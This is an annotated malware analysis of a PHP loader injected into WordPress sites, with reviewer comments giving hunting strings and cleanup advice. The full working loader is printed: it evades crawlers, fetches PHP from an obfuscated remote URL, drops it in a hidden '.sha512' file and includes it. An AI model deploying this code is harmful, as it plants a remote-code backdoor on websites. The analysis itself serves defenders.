- <?php
// NOTE(review): this listing is an injected PHP loader, not application code.
// What the visible code does: it filters requests, looks for a hidden file named
// ".sha512" under the working directory, and if none exists it downloads PHP from
// a remote location, writes it to that hidden file and include()s it.
// Strings that appear verbatim in this sample and are usable for hunting:
// '_shaesx_', 'wp_frmfunct', 'wp_function', '#gogo(.*)enen#is', and the file
// name ".sha512".

// Hide every PHP error so a failure of the injected code shows nothing on the page.
- @ini_set('display_errors', '0');
- error_reporting(0);
// Case-insensitive (~...~i) alternation of User-Agent substrings: search-engine
// crawlers, SEO bots, site copiers, download tools and vulnerability scanners.
// A request whose User-Agent matches is skipped by the gate below. This presumably
// keeps automated visitors from seeing the second stage.
- $bad_agents = '~google|360Spider|80legs|AIBOT|Aboundex|Acunetix|AhrefsBot|Alexibot|BLEXBot|BackDoorBot|BackWeb|Baiduspider|Bandit|BatchFTP|Bigfoot|Black.Hole|BlackWidow|BlowFish|BotALot|Buddy|BuiltBotTough|Bullseye|BunnySlippers|Cegbfeieh|CheeseBot|CherryPicker|ChinaClaw|Cogentbot|Collector|Copier|CopyRightCheck|Crescent|Custo|DIIbot|DISCo|DittoSpyder|Download Demon|Download Devil|Download Wonder|Drip|EasyDL|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|Express WebPictures|Extractor|EyeNetIE|FHscan|Foobot|FrontPage|Go-Ahead-Got-It|GrabNet|Grafula|HMView|HTTrack|Harvest|IlseBot|Image Stripper|Image Sucker|Indy Library|InfoNavibot|InfoTekies|Intelliseek|InterGET|Internet Ninja|Iria|JOC|Jakarta|James BOT|Java|JennyBot|JetCar|JustView|Jyxobot|Kenjin.Spider|Keyword.Density|LNSpiderguy|LWP::Simple|LexiBot|LinkScan/8.1a.Unix|LinkWalker|LinkextractorPro|LinkpadBot|MIDown tool|MIIxpc|MJ12bot|Mag-Net|Magnet|MarkWatch|Mass Downloader|Mata.Hari|MegaIndex.ru/2.0|Memo|Microsoft URL Control|Microsoft.URL|Mirror|Missigua Locator|Mister PiX|Mozilla.\*NEWT|Mozilla\/3.Mozilla\/2.01|NAMEPROTECT|NICErsPRO|NPbot|Navroad|NearSite|Net Vampire|NetAnts|NetMechanic|NetSpider|NetZIP|Netcraft|NextGenSearchBot|NimbleCrawler|Ninja|Octopus|Offline Explorer|Offline Navigator|Openfind|OutfoxBot|PHP version tracker|PageGrabber|Papa Foto|Pockey|ProPowerBot\/2.14|ProWebWalker|Pump|QueryN.Metasearch|RMA|ReGet|RealDownload|Reaper|Recorder|RepoMonkey|SEOkicks|SearchmetricsBot|SemrushBot|Siphon|SiteExplorer|SiteSnagger|SlySearch|SmartDownload|Snake|Snapbot|Snoopy|SpaceBison|SpankBot|Sqworm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|Szukacz\/1.4|Teleport|Telesoft|The.Intraformant|TheNomad|TightTwatBot|Titan|True_bot|TurnitinBot|TurnitinBot\/1.5|URLy.Warning|VCI|Vacuum|VoidEYE|WISENutbot|WWW-Collector-E|WWWOFFLE|Web Image Collector|Web Sucker|Web.Image.Collector|WebAuto|WebBandit|WebCopier|WebEMailExtrac.\*\" bot|WebEnhancer|WebFetch|WebGo 
IS|WebLeacher|WebReaper|WebSauger|WebStripper|WebWhacker|WebZIP|Webclipping.com|WebmasterWorldForumBot|Website Quester|Website eXtractor|Webster|Wget|Whacker|Widow|Xaldon|Xenu|Zeus|ZmEu|Zyborg|archive.org_bot|asterias|attach|cosmos|dragonfly|eCatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|libWeb\/clsHTTP|likse|lwp-trivial|moget|niki-bot|pavuk|pcBrowser|psbot|rogerBot|sogou|spanner|spbot|suzuran|tAkeOut|turingos~i';
// Case-sensitive pattern (no "i" flag) matched against host + request URI:
// WordPress login/admin/API/cron/feed paths, "administrator", and common static
// file extensions. Requests for those are skipped as well.
- $bad_urls = '#xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|wp-admin|administrator#';
// Gate: continue only when the User-Agent is not listed, httpget() is not yet
// defined, and the URL is not listed. httpget() is declared inside this branch, so
// the function_exists() test also stops a second injected copy from running (and
// from hitting a redeclaration error) in the same request. The @ operators hide
// warnings, for example when no User-Agent header was sent.
- if (!@preg_match($bad_agents, $_SERVER['HTTP_USER_AGENT']) && !function_exists('httpget') && !@preg_match($bad_urls, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'])) {
// String obfuscation. After the two str_replace() calls:
//   $ea = 'basesx_', $ee = 'basesx_decode', $oa = 'base64_decode'.
// $ay = 'httpget' and $ao = 'wp_cd' are function names called indirectly later.
// $algo = 'sha512' is used only to build the hidden file name ".sha512"; no hash
// is computed with it anywhere in this listing.
- $ea = '_shaesx_'; $ay = 'httpget'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $algo = 'sha512'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee);
// Base64 text. Further down it is base64-decoded, passed through wp_cd() with
// the key 'wp_function', and the result is handed to httpget() as the URL to
// fetch. NOTE(review): the value was not decoded for this review.
- $pass = "Zgc5c4MXrLszcAQOrYpaOLGePlOUMLhZ3zuKAQ==";
/**
 * Fetch a URL and return the response body, using whichever transport the host allows.
 *
 * Order of attempts: cURL if the extension is loaded, then file_get_contents()
 * if allow_url_fopen is on, then a hand-written HTTP/1.1 GET over fsockopen().
 * Only one transport is tried per call; a failure does not fall through to the next.
 *
 * NOTE(review): in this sample the function is the outbound download channel of an
 * injected loader. A web server process making requests with the hard-coded
 * Chrome/33.0.1750.154 User-Agent below is an indicator to look for in egress logs.
 *
 * @param string $url Address to request.
 * @return string|false Body text, or false on failure (curl_exec() and
 *                      file_get_contents() both return false when they fail).
 */
- function httpget($url) {
- if (function_exists('curl_init')) {
- $ch = curl_init($url);
// 8 s to connect, 15 s overall, response headers excluded, body returned as a string.
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
- curl_setopt($ch, CURLOPT_TIMEOUT, 15);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Fixed desktop-browser User-Agent instead of the cURL default.
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36');
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- } elseif (@ini_get('allow_url_fopen')) {
// Stream-wrapper fetch; warnings are hidden by @, so a failure only shows as false.
- return @file_get_contents($url);
- } else {
// Last resort: build the request by hand.
- $parts = parse_url($url);
- $target = $parts['host'];
// The port defaults to 80 whatever the URL scheme is, and the socket is opened
// without a TLS wrapper, so this branch always speaks plain HTTP.
- $port = isset($parts['port']) ? $parts['port'] : 80;
- $page = isset($parts['path']) ? $parts['path'] : '';
- $page .= isset($parts['query']) ? '?' . $parts['query'] : '';
- $page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : '';
- $page = ($page == '') ? '/' : $page;
// 3-second connect timeout.
- if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) {
// NOTE(review): socket_set_option() is a sockets-extension call for sockets made
// with socket_create(); $fp is an fsockopen() stream, so this call looks
// ineffective and @ hides the resulting error. Confirm before relying on the
// 1-second receive timeout it seems to intend.
- @socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec"=>1, "usec"=>1));
- $headers = "GET $page HTTP/1.1\r\n";
- $headers .= "Host: {$parts['host']}\r\n";
- $headers .= "Connection: Close\r\n\r\n";
- if (fwrite($fp, $headers)) {
- $resp = '';
// Read the response in chunks of at most 127 bytes until EOF or a read failure.
- while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) {
- $resp .= $curr;
- }
// Success only if the last fgets() returned data; a false read falls through
// to the shared fclose()/return false below.
- if (isset($curr) && $curr !== false) {
- fclose($fp);
// strstr() keeps everything from the first blank line onward. substr(..., 3) drops
// three of the four separator bytes, so the returned body starts with a "\n".
// Chunked transfer encoding is not decoded.
- return substr(strstr($resp, "\r\n\r\n"), 3);
- }
- }
- fclose($fp);
- }
- }
- return false;
- }
/**
 * XOR a byte string with a keystream derived from SHA-1.
 *
 * The keystream starts empty and grows by repeatedly appending the first $n raw
 * bytes of sha1($fa . <keystream so far> . "wp_frmfunct"), until it is at least
 * as long as the input. $n is 8 for inputs longer than 100 bytes and 2 otherwise.
 * Because the operation is a plain XOR, the same call both encodes and decodes.
 *
 * NOTE(review): this is string obfuscation, not encryption that protects anything.
 * Both the constant "wp_frmfunct" and the caller's key are present in the file,
 * so anything encoded with it can be recovered from the sample alone. The constant
 * is a convenient search string when hunting for copies of this loader.
 *
 * @param string $fd Bytes to transform.
 * @param string $fa Key mixed into every SHA-1 round (defaults to empty).
 * @return string $fd XORed with the keystream. PHP's string XOR stops at the
 *                shorter operand, so the result is as long as $fd, and an empty
 *                $fd gives an empty result.
 */
- function wp_cd($fd, $fa="")
- {
- $fe = "wp_frmfunct";
- $len = strlen($fd);
- $ff = '';
- $n = $len>100 ? 8 : 2;
- while( strlen($ff)<$len )
- {
// sha1() returns hex; pack('H*', ...) converts it to 20 raw bytes, of which $n are kept.
- $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
- }
- return $fd^$ff;
- }
// Stage 1: look for an existing copy of the second stage.
// The search covers each directory directly under the current working directory,
// and each directory one level below those, for a hidden file named ".sha512"
// ($algo holds 'sha512'). $ura records whether one was found or created and $eb
// holds the directory prefix.
//
// NOTE(review), for responders: the ".sha512" file holds PHP downloaded from a
// remote server and is executed through include. Deleting only that file makes the
// loader download it again on the next request that passes the gate. Deleting only
// the loader leaves the dropped PHP on disk. Both need to be removed, and the
// outbound request should be looked for in egress logs.
- $dirs = glob("*", GLOB_ONLYDIR);
- $ura = 0;
- foreach ($dirs as $dira) {
- if (file_exists("$dira/.$algo")) {
- $ura = 1;
- $eb = "$dira/";
// Run the cached second stage; @ hides any error it raises at include time.
- @include_once "$dira/.$algo";
- break;
- }
- $subdirs = glob("$dira/*", GLOB_ONLYDIR);
- foreach ($subdirs as $subdira) {
- if (file_exists("$subdira/.$algo")) {
- $ura = 1;
- $eb = "$subdira/";
// NOTE(review): this includes "$dira/.$algo", not "$subdira/.$algo". The parent
// path was just found missing above, so a copy found at the second level is
// detected but not executed here. The break leaves only the inner loop, so the
// outer loop keeps scanning the remaining directories.
- @include_once("$dira/.$algo");
- break;
- }
- }
- }
// Stage 2: nothing cached, so pick a writable location, download and run.
- if (!$ura) {
- foreach ($dirs as $dira) {
// fopen(..., 'w') is used as the writability test, so it creates or truncates the
// file as a side effect. The handle opened in the condition is never closed; a
// second handle is opened for the actual write.
- if (fopen("$dira/.$algo", 'w')) {
- $ura = 1;
- $eb = "$dira/";
- $hdl = fopen("$dira/.$algo", 'w');
- break;
- }
- $subdirs = glob("$dira/*", GLOB_ONLYDIR);
- foreach ($subdirs as $subdira) {
- if (fopen("$subdira/.$algo", 'w')) {
- $ura = 1;
- $eb = "$subdira/";
- $hdl = fopen("$subdira/.$algo", 'w');
// This break exits only the inner loop. The outer loop then moves to the next
// top-level directory and may create a second ".sha512" there, replacing $hdl
// and $eb. Zero-byte ".sha512" files can therefore be left in other directories;
// look for those too during cleanup.
- break;
- }
- }
- }
// Final fallback: the working directory itself.
- if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
// Indirect calls through the names built earlier in the script. This is
// httpget(wp_cd(base64_decode($pass), 'wp_function')): the embedded blob is
// decoded to a URL and that URL is fetched.
- $reqw = $ay($ao($oa("$pass"), 'wp_function'));
// The payload is the text between the literal markers "gogo" and "enen" in the
// response (case-insensitive, dot matches newlines). Both markers are usable
// strings for a network or proxy content signature.
- preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
// The payload arrives percent-encoded and is decoded before being written. Nothing
// is checked: if the fetch failed or the markers are absent, $mtchs[1] is unset
// and an empty file is written. If no location was writable, $hdl is undefined.
- fwrite($hdl, rawurldecode($mtchs[1]));
- fclose($hdl);
// Execute the freshly written second stage in the context of the current request.
- @include("{$eb}.$algo");
- }
- }
- ?>